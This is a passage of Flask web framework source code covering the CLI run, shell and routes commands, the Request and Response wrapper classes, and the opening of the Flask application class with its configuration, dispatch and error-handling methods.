debugger or server can handle it. traceback.print_exc() err = e def app( environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: raise err from None else: # When not reloading, raise the error immediately so the # command fails. raise e from None debug = get_debug_flag() if reload is None: reload = debug if debugger is None: debugger = debug show_server_banner(debug, info.app_import_path) run_simple( host, port, app, use_reloader=reload, use_debugger=debugger, threaded=with_threads, ssl_context=cert, extra_files=extra_files, exclude_patterns=exclude_patterns, ) run_command.params.insert(0, _debug_option) @click.command("shell", short_help="Run a shell in the app context.") @with_appcontext def shell_command() -> None: """Run an interactive Python shell in the context of a given Flask application. The application will populate the default namespace of this shell according to its configuration. This is useful for executing small snippets of management code without having to manually configure the application. """ import code banner = ( f"Python {sys.version} on {sys.platform}\n" f"App: {current_app.import_name}\n" f"Instance: {current_app.instance_path}" ) ctx: dict[str, t.Any] = {} # Support the regular Python interpreter startup script if someone # is using it. startup = os.environ.get("PYTHONSTARTUP") if startup and os.path.isfile(startup): with open(startup) as f: eval(compile(f.read(), startup, "exec"), ctx) ctx.update(current_app.make_shell_context()) # Site, customize, or startup script can set a hook to call when # entering interactive mode. The default one sets up readline with # tab and history completion. interactive_hook = getattr(sys, "__interactivehook__", None) if interactive_hook is not None: try: import readline from rlcompleter import Completer except ImportError: pass else: # rlcompleter uses __main__.__dict__ by default, which is # flask.__main__. Use the shell context instead. readline.set_completer(Completer(ctx).complete) interactive_hook() code.interact(banner=banner, local=ctx) @click.command("routes", short_help="Show the routes for the app.") @click.option( "--sort", "-s", type=click.Choice(("endpoint", "methods", "domain", "rule", "match")), default="endpoint", help=( "Method to sort routes by. 'match' is the order that Flask will match routes" " when dispatching a request." ), ) @click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.") @with_appcontext def routes_command(sort: str, all_methods: bool) -> None: """Show all registered routes with endpoints and methods.""" rules = list(current_app.url_map.iter_rules()) if not rules: click.echo("No routes were registered.") return ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"} host_matching = current_app.url_map.host_matching has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules) rows = [] for rule in rules: row = [ rule.endpoint, ", ".join(sorted((rule.methods or set()) - ignored_methods)), ] if has_domain: row.append((rule.host if host_matching else rule.subdomain) or "") row.append(rule.rule) rows.append(row) headers = ["Endpoint", "Methods"] sorts = ["endpoint", "methods"] if has_domain: headers.append("Host" if host_matching else "Subdomain") sorts.append("domain") headers.append("Rule") sorts.append("rule") try: rows.sort(key=itemgetter(sorts.index(sort))) except ValueError: pass rows.insert(0, headers) widths = [max(len(row[i]) for row in rows) for i in range(len(headers))] rows.insert(1, ["-" * w for w in widths]) template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths)) for row in rows: click.echo(template.format(*row)) cli = FlaskGroup( name="flask", help="""\ A general utility script for Flask applications. An application to load must be given with the '--app' option, 'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file in the current directory. """, ) def main() -> None: cli.main() if __name__ == "__main__": main() File: src/flask/wrappers.py from __future__ import annotations import typing as t from werkzeug.exceptions import BadRequest from werkzeug.exceptions import HTTPException from werkzeug.wrappers import Request as RequestBase from werkzeug.wrappers import Response as ResponseBase from . import json from .globals import current_app from .helpers import _split_blueprint_path if t.TYPE_CHECKING: # pragma: no cover from werkzeug.routing import Rule class Request(RequestBase): """The request object used by default in Flask. Remembers the matched endpoint and view arguments. It is what ends up as :class:`~flask.request`. If you want to replace the request object used you can subclass this and set :attr:`~flask.Flask.request_class` to your subclass. The request object is a :class:`~werkzeug.wrappers.Request` subclass and provides all of the attributes Werkzeug defines plus a few Flask specific ones. """ json_module: t.Any = json #: The internal URL rule that matched the request. This can be #: useful to inspect which methods are allowed for the URL from #: a before/after handler (``request.url_rule.methods``) etc. #: Though if the request's method was invalid for the URL rule, #: the valid list is available in ``routing_exception.valid_methods`` #: instead (an attribute of the Werkzeug exception #: :exc:`~werkzeug.exceptions.MethodNotAllowed`) #: because the request was never internally bound. #: #: .. versionadded:: 0.6 url_rule: Rule | None = None #: A dict of view arguments that matched the request. If an exception #: happened when matching, this will be ``None``. view_args: dict[str, t.Any] | None = None #: If matching the URL failed, this is the exception that will be #: raised / was raised as part of the request handling. This is #: usually a :exc:`~werkzeug.exceptions.NotFound` exception or #: something similar. routing_exception: HTTPException | None = None @property def max_content_length(self) -> int | None: # type: ignore[override] """Read-only view of the ``MAX_CONTENT_LENGTH`` config key.""" if current_app: return current_app.config["MAX_CONTENT_LENGTH"] # type: ignore[no-any-return] else: return None @property def endpoint(self) -> str | None: """The endpoint that matched the request URL. This will be ``None`` if matching failed or has not been performed yet. This in combination with :attr:`view_args` can be used to reconstruct the same URL or a modified URL. """ if self.url_rule is not None: return self.url_rule.endpoint # type: ignore[no-any-return] return None @property def blueprint(self) -> str | None: """The registered name of the current blueprint. This will be ``None`` if the endpoint is not part of a blueprint, or if URL matching failed or has not been performed yet. This does not necessarily match the name the blueprint was created with. It may have been nested, or registered with a different name. """ endpoint = self.endpoint if endpoint is not None and "." in endpoint: return endpoint.rpartition(".")[0] return None @property def blueprints(self) -> list[str]: """The registered names of the current blueprint upwards through parent blueprints. This will be an empty list if there is no current blueprint, or if URL matching failed. .. versionadded:: 2.0.1 """ name = self.blueprint if name is None: return [] return _split_blueprint_path(name) def _load_form_data(self) -> None: super()._load_form_data() # In debug mode we're replacing the files multidict with an ad-hoc # subclass that raises a different error for key errors. if ( current_app and current_app.debug and self.mimetype != "multipart/form-data" and not self.files ): from .debughelpers import attach_enctype_error_multidict attach_enctype_error_multidict(self) def on_json_loading_failed(self, e: ValueError | None) -> t.Any: try: return super().on_json_loading_failed(e) except BadRequest as e: if current_app and current_app.debug: raise raise BadRequest() from e class Response(ResponseBase): """The response object that is used by default in Flask. Works like the response object from Werkzeug but is set to have an HTML mimetype by default. Quite often you don't have to create this object yourself because :meth:`~flask.Flask.make_response` will take care of that for you. If you want to replace the response object used you can subclass this and set :attr:`~flask.Flask.response_class` to your subclass. .. versionchanged:: 1.0 JSON support is added to the response, like the request. This is useful when testing to get the test client response data as JSON. .. versionchanged:: 1.0 Added :attr:`max_cookie_size`. """ default_mimetype: str | None = "text/html" json_module = json autocorrect_location_header = False @property def max_cookie_size(self) -> int: # type: ignore """Read-only view of the :data:`MAX_COOKIE_SIZE` config key. See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in Werkzeug's docs. """ if current_app: return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return] # return Werkzeug's default when not in an app context return super().max_cookie_size File: src/flask/app.py from __future__ import annotations import collections.abc as cabc import os import sys import typing as t import weakref from datetime import timedelta from inspect import iscoroutinefunction from itertools import chain from types import TracebackType from urllib.parse import quote as _url_quote import click from werkzeug.datastructures import Headers from werkzeug.datastructures import ImmutableDict from werkzeug.exceptions import BadRequestKeyError from werkzeug.exceptions import HTTPException from werkzeug.exceptions import InternalServerError from werkzeug.routing import BuildError from werkzeug.routing import MapAdapter from werkzeug.routing import RequestRedirect from werkzeug.routing import RoutingException from werkzeug.routing import Rule from werkzeug.serving import is_running_from_reloader from werkzeug.wrappers import Response as BaseResponse from . import cli from . import typing as ft from .ctx import AppContext from .ctx import RequestContext from .globals import _cv_app from .globals import _cv_request from .globals import current_app from .globals import g from .globals import request from .globals import request_ctx from .globals import session from .helpers import get_debug_flag from .helpers import get_flashed_messages from .helpers import get_load_dotenv from .helpers import send_from_directory from .sansio.app import App from .sansio.scaffold import _sentinel from .sessions import SecureCookieSessionInterface from .sessions import SessionInterface from .signals import appcontext_tearing_down from .signals import got_request_exception from .signals import request_finished from .signals import request_started from .signals import request_tearing_down from .templating import Environment from .wrappers import Request from .wrappers import Response if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import StartResponse from _typeshed.wsgi import WSGIEnvironment from .testing import FlaskClient from .testing import FlaskCliRunner T_shell_context_processor = t.TypeVar( "T_shell_context_processor", bound=ft.ShellContextProcessorCallable ) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) def _make_timedelta(value: timedelta | int | None) -> timedelta | None: if value is None or isinstance(value, timedelta): return value return timedelta(seconds=value) class Flask(App): """The flask object implements a WSGI application and acts as the central object. It is passed the name of the module or package of the application. Once it is created it will act as a central registry for the view functions, the URL rules, template configuration and much more. The name of the package is used to resolve resources from inside the package or the folder the module is contained in depending on if the package parameter resolves to an actual python package (a folder with an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). For more information about resource loading, see :func:`open_resource`. Usually you create a :class:`Flask` instance in your main module or in the :file:`__init__.py` file of your package like this:: from flask import Flask app = Flask(__name__) .. admonition:: About the First Parameter The idea of the first parameter is to give Flask an idea of what belongs to your application. This name is used to find resources on the filesystem, can be used by extensions to improve debugging information and a lot more. So it's important what you provide there. If you are using a single module, `__name__` is always the correct value. If you however are using a package, it's usually recommended to hardcode the name of your package there. For example if your application is defined in :file:`yourapplication/app.py` you should create it with one of the two versions below:: app = Flask('yourapplication') app = Flask(__name__.split('.')[0]) Why is that? The application will work even with `__name__`, thanks to how resources are looked up. However it will make debugging more painful. Certain extensions can make assumptions based on the import name of your application. For example the Flask-SQLAlchemy extension will look for the code in your application that triggered an SQL query in debug mode. If the import name is not properly set up, that debugging information is lost. (For example it would only pick up SQL queries in `yourapplication.app` and not `yourapplication.views.frontend`) .. versionadded:: 0.7 The `static_url_path`, `static_folder`, and `template_folder` parameters were added. .. versionadded:: 0.8 The `instance_path` and `instance_relative_config` parameters were added. .. versionadded:: 0.11 The `root_path` parameter was added. .. versionadded:: 1.0 The ``host_matching`` and ``static_host`` parameters were added. .. versionadded:: 1.0 The ``subdomain_matching`` parameter was added. Subdomain matching needs to be enabled manually now. Setting :data:`SERVER_NAME` does not implicitly enable it. :param import_name: the name of the application package :param static_url_path: can be used to specify a different path for the static files on the web. Defaults to the name of the `static_folder` folder. :param static_folder: The folder with static files that is served at ``static_url_path``. Relative to the application ``root_path`` or an absolute path. Defaults to ``'static'``. :param static_host: the host to use when adding the static route. Defaults to None. Required when using ``host_matching=True`` with a ``static_folder`` configured. :param host_matching: set ``url_map.host_matching`` attribute. Defaults to False. :param subdomain_matching: consider the subdomain relative to :data:`SERVER_NAME` when matching routes. Defaults to False. :param template_folder: the folder that contains the templates that should be used by the application. Defaults to ``'templates'`` folder in the root path of the application. :param instance_path: An alternative instance path for the application. By default the folder ``'instance'`` next to the package or module is assumed to be the instance path. :param instance_relative_config: if set to ``True`` relative filenames for loading the config are assumed to be relative to the instance path instead of the application root. :param root_path: The path to the root of the application files. This should only be set manually when it can't be detected automatically, such as for namespace packages. """ default_config = ImmutableDict( { "DEBUG": None, "TESTING": False, "PROPAGATE_EXCEPTIONS": None, "SECRET_KEY": None, "PERMANENT_SESSION_LIFETIME": timedelta(days=31), "USE_X_SENDFILE": False, "SERVER_NAME": None, "APPLICATION_ROOT": "/", "SESSION_COOKIE_NAME": "session", "SESSION_COOKIE_DOMAIN": None, "SESSION_COOKIE_PATH": None, "SESSION_COOKIE_HTTPONLY": True, "SESSION_COOKIE_SECURE": False, "SESSION_COOKIE_SAMESITE": None, "SESSION_REFRESH_EACH_REQUEST": True, "MAX_CONTENT_LENGTH": None, "SEND_FILE_MAX_AGE_DEFAULT": None, "TRAP_BAD_REQUEST_ERRORS": None, "TRAP_HTTP_EXCEPTIONS": False, "EXPLAIN_TEMPLATE_LOADING": False, "PREFERRED_URL_SCHEME": "http", "TEMPLATES_AUTO_RELOAD": None, "MAX_COOKIE_SIZE": 4093, "PROVIDE_AUTOMATIC_OPTIONS": True, } ) #: The class that is used for request objects. See :class:`~flask.Request` #: for more information. request_class: type[Request] = Request #: The class that is used for response objects. See #: :class:`~flask.Response` for more information. response_class: type[Response] = Response #: the session interface to use. By default an instance of #: :class:`~flask.sessions.SecureCookieSessionInterface` is used here. #: #: .. versionadded:: 0.8 session_interface: SessionInterface = SecureCookieSessionInterface() def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike[str] | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, template_folder: str | os.PathLike[str] | None = "templates", instance_path: str | None = None, instance_relative_config: bool = False, root_path: str | None = None, ): super().__init__( import_name=import_name, static_url_path=static_url_path, static_folder=static_folder, static_host=static_host, host_matching=host_matching, subdomain_matching=subdomain_matching, template_folder=template_folder, instance_path=instance_path, instance_relative_config=instance_relative_config, root_path=root_path, ) #: The Click command group for registering CLI commands for this #: object. The commands are available from the ``flask`` command #: once the application has been discovered and blueprints have #: been registered. self.cli = cli.AppGroup() # Set the name of the Click group in case someone wants to add # the app's commands to another CLI tool. self.cli.name = self.name # Add a static route using the provided static_url_path, static_host, # and static_folder if there is a configured static_folder. # Note we do this without checking if static_folder exists. # For one, it might be created while the server is running (e.g. during # development). Also, Google App Engine stores static files somewhere if self.has_static_folder: assert ( bool(static_host) == host_matching ), "Invalid static_host/host_matching combination" # Use a weakref to avoid creating a reference cycle between the app # and the view function (see #3761). self_ref = weakref.ref(self) self.add_url_rule( f"{self.static_url_path}/<path:filename>", endpoint="static", host=static_host, view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 ) def get_send_file_max_age(self, filename: str | None) -> int | None: """Used by :func:`send_file` to determine the ``max_age`` cache value for a given file path if it wasn't passed. By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from the configuration of :data:`~flask.current_app`. This defaults to ``None``, which tells the browser to use conditional requests instead of a timed cache, which is usually preferable. Note this is a duplicate of the same method in the Flask class. .. versionchanged:: 2.0 The default configuration is ``None`` instead of 12 hours. .. versionadded:: 0.9 """ value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] if value is None: return None if isinstance(value, timedelta): return int(value.total_seconds()) return value # type: ignore[no-any-return] def send_static_file(self, filename: str) -> Response: """The view function used to serve files from :attr:`static_folder`. A route is automatically registered for this view at :attr:`static_url_path` if :attr:`static_folder` is set. Note this is a duplicate of the same method in the Flask class. .. versionadded:: 0.5 """ if not self.has_static_folder: raise RuntimeError("'static_folder' must be set to serve static_files.") # send_file only knows to call get_send_file_max_age on the app, # call it here so it works for blueprints too. max_age = self.get_send_file_max_age(filename) return send_from_directory( t.cast(str, self.static_folder), filename, max_age=max_age ) def open_resource( self, resource: str, mode: str = "rb", encoding: str | None = None ) -> t.IO[t.AnyStr]: """Open a resource file relative to :attr:`root_path` for reading. For example, if the file ``schema.sql`` is next to the file ``app.py`` where the ``Flask`` app is defined, it can be opened with: .. code-block:: python with app.open_resource("schema.sql") as f: conn.executescript(f.read()) :param resource: Path to the resource relative to :attr:`root_path`. :param mode: Open the file in this mode. Only reading is supported, valid values are ``"r"`` (or ``"rt"``) and ``"rb"``. :param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ if mode not in {"r", "rt", "rb"}: raise ValueError("Resources can only be opened for reading.") path = os.path.join(self.root_path, resource) if mode == "rb": return open(path, mode) return open(path, mode, encoding=encoding) def open_instance_resource( self, resource: str, mode: str = "rb", encoding: str | None = "utf-8" ) -> t.IO[t.AnyStr]: """Open a resource file relative to the application's instance folder :attr:`instance_path`. Unlike :meth:`open_resource`, files in the instance folder can be opened for writing. :param resource: Path to the resource relative to :attr:`instance_path`. :param mode: Open the file in this mode. :param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ path = os.path.join(self.instance_path, resource) if "b" in mode: return open(path, mode) return open(path, mode, encoding=encoding) def create_jinja_environment(self) -> Environment: """Create the Jinja environment based on :attr:`jinja_options` and the various Jinja-related methods of the app. Changing :attr:`jinja_options` after this will have no effect. Also adds Flask-related globals and filters to the environment. .. versionchanged:: 0.11 ``Environment.auto_reload`` set in accordance with ``TEMPLATES_AUTO_RELOAD`` configuration option. .. versionadded:: 0.5 """ options = dict(self.jinja_options) if "autoescape" not in options: options["autoescape"] = self.select_jinja_autoescape if "auto_reload" not in options: auto_reload = self.config["TEMPLATES_AUTO_RELOAD"] if auto_reload is None: auto_reload = self.debug options["auto_reload"] = auto_reload rv = self.jinja_environment(self, **options) rv.globals.update( url_for=self.url_for, get_flashed_messages=get_flashed_messages, config=self.config, # request, session and g are normally added with the # context processor for efficiency reasons but for imported # templates we also want the proxies in there. request=request, session=session, g=g, ) rv.policies["json.dumps_function"] = self.json.dumps return rv def create_url_adapter(self, request: Request | None) -> MapAdapter | None: """Creates a URL adapter for the given request. The URL adapter is created at a point where the request context is not yet set up so the request is passed explicitly. .. versionadded:: 0.6 .. versionchanged:: 0.9 This can now also be called without a request object when the URL adapter is created for the application context. .. versionchanged:: 1.0 :data:`SERVER_NAME` no longer implicitly enables subdomain matching. Use :attr:`subdomain_matching` instead. """ if request is not None: # If subdomain matching is disabled (the default), use the # default subdomain in all cases. This should be the default # in Werkzeug but it currently does not have that feature. if not self.subdomain_matching: subdomain = self.url_map.default_subdomain or None else: subdomain = None return self.url_map.bind_to_environ( request.environ, server_name=self.config["SERVER_NAME"], subdomain=subdomain, ) # We need at the very least the server name to be set for this # to work. if self.config["SERVER_NAME"] is not None: return self.url_map.bind( self.config["SERVER_NAME"], script_name=self.config["APPLICATION_ROOT"], url_scheme=self.config["PREFERRED_URL_SCHEME"], ) return None def raise_routing_exception(self, request: Request) -> t.NoReturn: """Intercept routing exceptions and possibly do something else. In debug mode, intercept a routing redirect and replace it with an error if the body will be discarded. With modern Werkzeug this shouldn't occur, since it now uses a 308 status which tells the browser to resend the method and body. .. versionchanged:: 2.1 Don't intercept 307 and 308 redirects. :meta private: :internal: """ if ( not self.debug or not isinstance(request.routing_exception, RequestRedirect) or request.routing_exception.code in {307, 308} or request.method in {"GET", "HEAD", "OPTIONS"} ): raise request.routing_exception # type: ignore[misc] from .debughelpers import FormDataRoutingRedirect raise FormDataRoutingRedirect(request) def update_template_context(self, context: dict[str, t.Any]) -> None: """Update the template context with some commonly used variables. This injects request, session, config and g into the template context as well as everything template context processors want to inject. Note that the as of Flask 0.6, the original values in the context will not be overridden if a context processor decides to return a value with the same key. :param context: the context as a dictionary that is updated in place to add extra variables. """ names: t.Iterable[str | None] = (None,) # A template may be rendered outside a request context. if request: names = chain(names, reversed(request.blueprints)) # The values passed to render_template take precedence. Keep a # copy to re-apply after all context functions. orig_ctx = context.copy() for name in names: if name in self.template_context_processors: for func in self.template_context_processors[name]: context.update(self.ensure_sync(func)()) context.update(orig_ctx) def make_shell_context(self) -> dict[str, t.Any]: """Returns the shell context for an interactive shell for this application. This runs all the registered shell context processors. .. versionadded:: 0.11 """ rv = {"app": self, "g": g} for processor in self.shell_context_processors: rv.update(processor()) return rv def run( self, host: str | None = None, port: int | None = None, debug: bool | None = None, load_dotenv: bool = True, **options: t.Any, ) -> None: """Runs the application on a local development server. Do not use ``run()`` in a production setting. It is not intended to meet security and performance requirements for a production server. Instead, see :doc:`/deploying/index` for WSGI server recommendations. If the :attr:`debug` flag is set the server will automatically reload for code changes and show a debugger in case an exception happened. If you want to run the application in debug mode, but disable the code execution on the interactive debugger, you can pass ``use_evalex=False`` as parameter. This will keep the debugger's traceback screen active, but disable code execution. It is not recommended to use this function for development with automatic reloading as this is badly supported. Instead you should be using the :command:`flask` command line script's ``run`` support. .. admonition:: Keep in Mind Flask will suppress any server error with a generic error page unless it is in debug mode. As such to enable just the interactive debugger without the code reloading, you have to invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``. Setting ``use_debugger`` to ``True`` without being in debug mode won't catch any exceptions because there won't be any to catch. :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to have the server available externally as well. Defaults to ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable if present. :param port: the port of the webserver. Defaults to ``5000`` or the port defined in the ``SERVER_NAME`` config variable if present. :param debug: if given, enable or disable debug mode. See :attr:`debug`. :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` files to set environment variables. Will also change the working directory to the directory containing the first file found. :param options: the options to be forwarded to the underlying Werkzeug server. See :func:`werkzeug.serving.run_simple` for more information. .. versionchanged:: 1.0 If installed, python-dotenv will be used to load environment variables from :file:`.env` and :file:`.flaskenv` files. The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`. Threaded mode is enabled by default. .. versionchanged:: 0.10 The default port is now picked from the ``SERVER_NAME`` variable. """ # Ignore this call so that it doesn't start another server if # the 'flask run' command is used. if os.environ.get("FLASK_RUN_FROM_CLI") == "true": if not is_running_from_reloader(): click.secho( " * Ignoring a call to 'app.run()' that would block" " the current 'flask' CLI command.\n" " Only call 'app.run()' in an 'if __name__ ==" ' "__main__"\' guard.', fg="red", ) return if get_load_dotenv(load_dotenv): cli.load_dotenv() # if set, env var overrides existing value if "FLASK_DEBUG" in os.environ: self.debug = get_debug_flag() # debug passed to method overrides all other sources if debug is not None: self.debug = bool(debug) server_name = self.config.get("SERVER_NAME") sn_host = sn_port = None if server_name: sn_host, _, sn_port = server_name.partition(":") if not host: if sn_host: host = sn_host else: host = "127.0.0.1" if port or port == 0: port = int(port) elif sn_port: port = int(sn_port) else: port = 5000 options.setdefault("use_reloader", self.debug) options.setdefault("use_debugger", self.debug) options.setdefault("threaded", True) cli.show_server_banner(self.debug, self.name) from werkzeug.serving import run_simple try: run_simple(t.cast(str, host), port, self, **options) finally: # reset the first request information if the development server # reset normally. This makes it possible to restart the server # without reloader and that stuff from an interactive shell. self._got_first_request = False def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient: """Creates a test client for this application. For information about unit testing head over to :doc:`/testing`. Note that if you are testing for assertions or exceptions in your application code, you must set ``app.testing = True`` in order for the exceptions to propagate to the test client. Otherwise, the exception will be handled by the application (not visible to the test client) and the only indication of an AssertionError or other exception will be a 500 status code response to the test client. See the :attr:`testing` attribute. For example:: app.testing = True client = app.test_client() The test client can be used in a ``with`` block to defer the closing down of the context until the end of the ``with`` block. This is useful if you want to access the context locals for testing:: with app.test_client() as c: rv = c.get('/?vodka=42') assert request.args['vodka'] == '42' Additionally, you may pass optional keyword arguments that will then be passed to the application's :attr:`test_client_class` constructor. For example:: from flask.testing import FlaskClient class CustomClient(FlaskClient): def __init__(self, *args, **kwargs): self._authentication = kwargs.pop("authentication") super(CustomClient,self).__init__( *args, **kwargs) app.test_client_class = CustomClient client = app.test_client(authentication='Basic ....') See :class:`~flask.testing.FlaskClient` for more information. .. versionchanged:: 0.4 added support for ``with`` block usage for the client. .. versionadded:: 0.7 The `use_cookies` parameter was added as well as the ability to override the client to be used by setting the :attr:`test_client_class` attribute. .. versionchanged:: 0.11 Added `**kwargs` to support passing additional keyword arguments to the constructor of :attr:`test_client_class`. """ cls = self.test_client_class if cls is None: from .testing import FlaskClient as cls return cls( # type: ignore self, self.response_class, use_cookies=use_cookies, **kwargs ) def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner: """Create a CLI runner for testing CLI commands. See :ref:`testing-cli`. Returns an instance of :attr:`test_cli_runner_class`, by default :class:`~flask.testing.FlaskCliRunner`. The Flask app object is passed as the first argument. .. versionadded:: 1.0 """ cls = self.test_cli_runner_class if cls is None: from .testing import FlaskCliRunner as cls return cls(self, **kwargs) # type: ignore def handle_http_exception( self, e: HTTPException ) -> HTTPException | ft.ResponseReturnValue: """Handles an HTTP exception. By default this will invoke the registered error handlers and fall back to returning the exception as response. .. versionchanged:: 1.0.3 ``RoutingException``, used internally for actions such as slash redirects during routing, is not passed to error handlers. .. versionchanged:: 1.0 Exceptions are looked up by code *and* by MRO, so ``HTTPException`` subclasses can be handled with a catch-all handler for the base ``HTTPException``. .. versionadded:: 0.3 """ # Proxy exceptions don't have error codes. We want to always return # those unchanged as errors if e.code is None: return e # RoutingExceptions are used internally to trigger routing # actions, such as slash redirects raising RequestRedirect. They # are not raised or handled in user code. if isinstance(e, RoutingException): return e handler = self._find_error_handler(e, request.blueprints) if handler is None: return e return self.ensure_sync(handler)(e) # type: ignore[no-any-return] def handle_user_exception( self, e: Exception ) -> HTTPException | ft.ResponseReturnValue: """This method is called whenever an exception occurs that should be handled. A special case is :class:`~werkzeug .exceptions.HTTPException` which is forwarded to the :meth:`handle_http_exception` method. This function will either return a response value or reraise the exception with the same traceback. .. versionchanged:: 1.0 Key errors raised from request data like ``form`` show the bad key in debug mode rather than a generic bad request message. .. versionadded:: 0.7 """ if isinstance(e, BadRequestKeyError) and ( self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"] ): e.show_exception = True if isinstance(e, HTTPException) and not self.trap_http_exception(e): return self.handle_http_exception(e) handler = self._find_error_handler(e, request.blueprints) if handler is None: raise return self.ensure_sync(handler)(e) # type: ignore[no-any-return] def handle_exception(self, e: Exception) -> Response: """Handle an exception that did not have an error handler associated with it, or that was raised from an error handler. This always causes a 500 ``InternalServerError``. Always sends the :data:`got_request_exception` signal. If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug mode, the error will be re-raised so that the debugger can display it. Otherwise, the original exception is logged, and an :exc:`~werkzeug.exceptions.InternalServerError` is returned. If an error handler is registered for ``InternalServerError`` or ``500``, it will be used. For consistency, the handler will always receive the ``InternalServerError``. The original unhandled exception is available as ``e.original_exception``. .. versionchanged:: 1.1.0 Always passes the ``InternalServerError`` instance to the handler, setting ``original_exception`` to the unhandled error. .. versionchanged:: 1.1.0 ``after_request`` functions and other finalization is done even for the default 500 response when there is no handler. .. versionadded:: 0.3 """ exc_info = sys.exc_info() got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e) propagate = self.config["PROPAGATE_EXCEPTIONS"] if propagate is None: propagate = self.testing or self.debug if propagate: # Re-raise if called with an active exception, otherwise # raise the passed in exception. if exc_info[1] is e: raise raise e self.log_exception(exc_info) server_error: InternalServerError | ft.ResponseReturnValue server_error = InternalServerError(original_exception=e) handler = self._find_error_handler(server_error, request.blueprints) if handler is not None: server_error = self.ensure_sync(handler)(server_error) return self.finalize_request(server_error, from_error_handler=True) def log_exception( self, exc_info: (tuple[type, BaseException, TracebackType] | tuple[None, None, None]), ) -> None: """Logs an exception. This is called by :meth:`handle_exception` if debugging is disabled and right before the handler is called. The default implementation logs the exception as error on the :attr:`logger`. .. versionadded:: 0.8 """ self.logger.error( f"Exception on {request.path} [{request.method}]", exc_info=exc_info ) def dispatch_request(self) -> ft.ResponseReturnValue: """Does the request dispatching. Matches the URL and returns the return value of the view or error handler. This does not have to be a response object. In order to convert the return value to a proper response object, call :func:`make_response`. .. versionchanged:: 0.7 This no longer does the exception handling, this code was moved to the new :meth:`full_dispatch_request`. """ req = request_ctx.request if req.routing_exception is not None: self.raise_routing_exception(req) rule: Rule = req.url_rule # type: ignore[assignment] # if we provide automatic options for this URL and the # request came with the OPTIONS method, reply automatically if ( getattr(rule, "provide_automatic_options", False) and req.method == "OPTIONS" ): return self.make_default_options_response() # otherwise dispatch to the handler for that endpoint view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment] return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return] def full_dispatch_request(self) -> Response: """Dispatches the request and on top of that performs request pre and postprocessing as well as HTTP exception catching and error handling. .. versionadded:: 0.7 """ self._got_first_request = True try: request_started.send(self, _async_wrapper=self.ensure_sync) rv = self.preprocess_request() if rv is None: rv = self.dispatch_request() except Exception as e: rv = self.handle_user_exception(e) return self.finalize_request(rv) def finalize_request( self, rv: ft.ResponseReturnValue | HTTPException, from_error_handler: bool = False, ) -> Response: """Given the return value from a view function this finalizes the request by converting it into a response and invoking the postprocessing functions. This is invoked for both normal request dispatching as well as error handlers. Because this means that it might be called as a result of a failure a special safe mode is available which can be enabled with the `from_error_handler` flag. If enabled, failures in response processing will be logged and otherwise ignored. :internal: """ response = self.make_response(rv) try: response = self.process_response(response) request_finished.send( self, _async_wrapper=self.ensure_sync, response=response ) except Exception: if not from_error_handler: raise self.logger.exception( "Request finalizing failed with an error while handling an error" ) return response def make_default_options_response(self) -> Response: """This method is called to create the default ``OPTIONS`` response. This can be changed through subclassing to change the default behavior of ``OPTIONS`` responses. .. versionadded:: 0.7 """ adapter = request_ctx.url_adapter methods = adapter.allowed_methods() # type: ignore[union-attr] rv = self.response_class() rv.allow.update(methods) return rv def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]: """Ensure that the function is synchronous for WSGI workers. Plain ``def`` functions are returned as-is. ``async def`` functions are wrapped to run and wait for the response. Override this method to change how the app runs async views. .. versionadded:: 2.0 """ if iscoroutinefunction(func): return self.async_to_sync(func) return func def async_to_sync( self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]] ) -> t.Callable[..., t.Any]: """Return a sync function that will run the coroutine function. .. code-block:: python result = app.async_to_sync(func)(*args, **kwargs) Override this method to change how the app converts async code to be synchronously callable. .. versionadded:: 2.0 """ try: from asgiref.sync import async_to_sync as asgiref_async_to_sync except ImportError: raise RuntimeError( "Install Flask with the 'async' extra in order to use async views." ) from None return asgiref_async_to_sync(func) def url_for( self, /, endpoint: str, *, _anchor: str | None = None, _method: str | None = None, _scheme: str | None = None, _external: bool | None = None, **values: t.Any, ) -> str: """Generate a URL to the given endpoint with the given values. This is called by :func:`flask.url_for`, and can be called directly as well. An *endpoint* is the name of a URL rule, usually added with :meth:`@app.route() <route>`, and usually the same name as the view function. A route defined in a :class:`~flask.Blueprint` will prepend the blueprint's name separated by a ``.`` to the endpoint. In some cases, such as email messages, you want URLs to include the scheme and domain, like ``https://example.com/hello``. When not in an active request, URLs will be external by default, 